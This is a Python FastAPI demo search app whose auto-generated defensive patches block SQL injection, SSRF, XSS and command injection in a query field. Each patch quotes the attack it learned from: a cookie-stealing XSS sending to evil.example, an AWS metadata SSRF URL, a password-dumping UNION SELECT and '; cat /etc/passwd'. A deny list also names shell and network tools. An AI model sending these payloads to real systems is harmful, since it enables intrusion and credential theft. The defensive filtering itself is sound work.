"""Search app: GET /search?q=...

Approved patches for the q field are written as Python between the
AUTO-PATCHES markers below (by chameleon.patch.integrate, from the Redis patch
store) and run before the query is used.
Run alone: uvicorn chameleon.apps.search_app:app --port 8202
"""
from __future__ import annotations

from fastapi import APIRouter, FastAPI

from .patchkit import PatchSet, deny, normalize  # noqa: F401 - used by the generated patches

patches = PatchSet()

# >>> CHAMELEON AUTO-PATCHES BEGIN >>> generated by chameleon.patch.integrate; edits here are overwritten
# patch sqli-3 (8ea1736f): sqli. Rule written by Qwen3-Next-80B on the Nano; passed the replay, URL-encoding,
# normal-traffic and ReDoS tests and review by Gemma 4 12B before it was rendered here.
@patches.guard(rule_id='sqli-3', patch_id='8ea1736f-e5a9-45a8-9838-cc3b14ebb298', attack_type='sqli',
               fields=('q',),
               learned_from="1' UNION SELECT username, password FROM users--",
               description='Blocks SQLi attempts with UNION SELECT, including obfuscated variants like comments or whitespace')
def sqli_3_8ea1736f(value: str) -> bool:
    pattern = r'\bunion\s*(?:/\*.*?\*/|\s*)\s*select\b'
    return deny(pattern, normalize(value))  # URL-decoded + lowercased first

# patch ssrf-2 (60f6cbb4): ssrf. Rule written by Qwen3-Next-80B on the Nano; passed the replay, URL-encoding,
# normal-traffic and ReDoS tests and review by Gemma 4 12B before it was rendered here.
@patches.guard(rule_id='ssrf-2', patch_id='60f6cbb4-af1b-413d-addb-ea9995fd3f21', attack_type='ssrf',
               fields=('q',),
               learned_from='http://169.254.169.254/latest/meta-data/iam/',
               description='Blocks common SSRF endpoints including IP, hex, octal, and hostname variants of AWS metadata service')
def ssrf_2_60f6cbb4(value: str) -> bool:
    pattern = r'(?:http://(?:169\.254\.169\.254|0xa9fea9fe|0o150\.0372\.0150\.0372|metadata\.google\.internal)|https?://(?:169\.254\.169\.254|0xa9fea9fe|0o150\.0372\.0150\.0372|metadata\.google\.internal))'
    return deny(pattern, normalize(value))  # URL-decoded + lowercased first

# patch xss-5 (445adb6f): xss. Rule written by Qwen3-Next-80B on the Nano; passed the replay, URL-encoding,
# normal-traffic and ReDoS tests and review by Gemma 4 12B before it was rendered here.
@patches.guard(rule_id='xss-5', patch_id='445adb6f-5c12-43bc-9a2e-808c30001169', attack_type='xss',
               fields=('q',),
               learned_from="<svg/onload=fetch('//evil.example/'+document.cookie)>",
               description='Blocks SVG onload fetch XSS payloads with minimal whitespace flexibility, avoiding overmatching benign text')
def xss_5_445adb6f(value: str) -> bool:
    pattern = r'''<svg[^>]*?/\s*onload\s*=\s*fetch\s*\(\s*['"]//[^"'\s]+/[^"'\s]*['"]'''
    return deny(pattern, normalize(value))  # URL-decoded + lowercased first

# patch xss-1 (89827da9): xss. Rule written by Qwen3-Next-80B on the Nano; passed the replay, URL-encoding,
# normal-traffic and ReDoS tests and review by Gemma 4 12B before it was rendered here.
@patches.guard(rule_id='xss-1', patch_id='89827da9-2fd6-4b52-b3b6-e902e6682d94', attack_type='xss',
               fields=('q',),
               learned_from='<IMG SRC=x OnError=alert(1)>',
               description='Blocks IMG tags with OnError attributes after normalization')
def xss_1_89827da9(value: str) -> bool:
    pattern = r'<\s*img\s+src\s*=\s*[^>]*?onerror\s*=\s*[^>]*?>'
    return deny(pattern, normalize(value))  # URL-decoded + lowercased first

# patch command-injection-5 (0611b01c): command-injection. Rule written by Qwen3-Next-80B on the Nano; passed the replay, URL-encoding,
# normal-traffic and ReDoS tests and review by Gemma 4 12B before it was rendered here.
@patches.guard(rule_id='command-injection-5', patch_id='0611b01c-93d5-47bf-b62b-20460f88e263', attack_type='command-injection',
               fields=('q',),
               learned_from='shoes; cat /etc/passwd',
               description='Blocks command injection attempts by detecting shell metacharacters followed by common command executables, including relative paths and newlines')
def command_injection_5_0611b01c(value: str) -> bool:
    pattern = r'[;|&`$\n]\s*(?:[a-zA-Z_][a-zA-Z0-9_]*\/)?(?:cat|ls|whoami|id|curl|wget|bash|sh|perl|python|nc|telnet|echo|grep|awk|sed|find|rm|mv|cp|mkdir|rmdir|ps|top|kill|netstat|ss|dig|nslookup|ncat|socat|ftp|scp|sftp|ssh|base64|hexdump|xxd|strings|objdump|gcc|cc|make|tar|unzip|zip|chmod|chown|su|sudo|env|printenv|export|unset|source|builtin|type|which|whereis|locate|cut|sort|uniq|tr|head|tail|less|more|nl|tac|rev|fold|split|join|paste|diff|patch|md5sum|sha1sum|sha256sum|sha512sum|dd|mkfs|mount|umount|df|du|free|lsof|ping|traceroute|arp|ifconfig|ip|route|iwconfig|iwlist|host|arping|tcpdump|wireshark|tshark)\s*'
    return deny(pattern, normalize(value))  # URL-decoded + lowercased first
# <<< CHAMELEON AUTO-PATCHES END <<<

PRODUCTS = [
    {"id": 1, "name": "blue shirt", "price": 19.99},
    {"id": 2, "name": "red shoes", "price": 49.99},
    {"id": 3, "name": "green hat", "price": 12.5},
]

router = APIRouter()


@router.get("/search")
def search(q: str = ""):
    patches.check({"q": q})
    ql = q.lower()
    return {"results": [p for p in PRODUCTS if ql in p["name"].lower()]}


app = FastAPI(title="Chameleon Edge demo: search")
app.include_router(router)
